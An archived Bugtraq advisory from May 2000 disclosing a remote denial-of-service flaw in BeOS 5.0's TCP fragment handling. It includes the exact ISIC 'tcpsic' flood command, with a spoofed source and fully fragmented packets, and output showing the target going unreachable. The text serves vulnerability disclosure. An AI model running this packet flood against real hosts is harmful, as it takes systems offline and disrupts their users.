Bugtraq mailing list archives
AUX Security Advisory on Be/OS 5.0 (DoS)
From: visi0n () AUX-TECH ORG (visi0n)
Date: Thu, 18 May 2000 00:55:14 -0300
AUX Technologies. Security Advisory. Advisory: Remote Denial of Service against Be/OS. Release Date: May 15, 2000. Status: No fix yet. Vulnerable version: Be/OS Personal 5.0 build feb 212000 4:43:00. Vendor: Contacted and no answer. Shoutz: AUX PPL(braSil rulez), dethl0k, cryonic, drk, grafspee and mike frantzen(isic), a "fuck you" to sgi (stole codes is bad for your health). Description: The Be/OS Operating System version 5.0 have a vulnerability in the tcp fragmentation which can lock up the entire system, needing a cold reset to back work. The bug can be reproduced using the ISIC-0.05. [root@localhost isic-0.05]# ping 10.0.1.46 PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data. 64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms 64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms --- 10.0.1.46 ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss round-trip min/avg/max = 1.8/4.5/7.3 ms [root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0 -I0 -T0 -u0 -t0 Compiled against Libnet 1.0.1b Installing Signal Handlers. Seeding with 31337 No Maximum traffic limiter Using random source ports. Using random destination ports. Bad IP Version = 0% IP Opts Pcnt = 0% Frag'd Pcnt = 100% Urg Pcnt = 0% Bad TCP Cksm = 0% TCP Opts Pcnt = 0% 1000 @ 1802.8 pkts/sec and 1174.6 k/s 2000 @ 1636.8 pkts/sec and 1105.5 k/s 3000 @ 2110.2 pkts/sec and 1396.4 k/s 4000 @ 1689.1 pkts/sec and 1105.4 k/s Caught signal 2 Used random seed 31337 Wrote 5002 packets in 2.74s @ 1824.48 pkts/s [root@localhost isic-0.05]# ping 10.0.1.46 PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data. --- 10.0.1.46 ping statistics --- 11 packets transmitted, 0 packets received, 100% packet loss [root@localhost isic-0.05]# =============================================================================== visi0n AUX Technologies [www.aux-tech.org]
Current thread:
- Re: BUFFER OVERRUN VULNERABILITIES IN KERBEROS, (continued)
- Re: BUFFER OVERRUN VULNERABILITIES IN KERBEROS Kris Kennaway (May 18)
- antisniff x86/linux remote root exploit, including "fixed" 1.02 version Sebastian (May 16)
- announce : Nessus 1.0 released Renaud Deraison (May 17)
- RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 17)
- FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED] FreeBSD Security Officer (May 17)
- klogin remote exploit duke (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
- antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
- Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
- AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
- Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
- RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
- Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
- Filesystem vulnerability in AIX salme () US IBM COM (May 23)
- Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
- Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
- Remote xploit for MDBMS |[TDP]| (May 24)
- HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
- Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)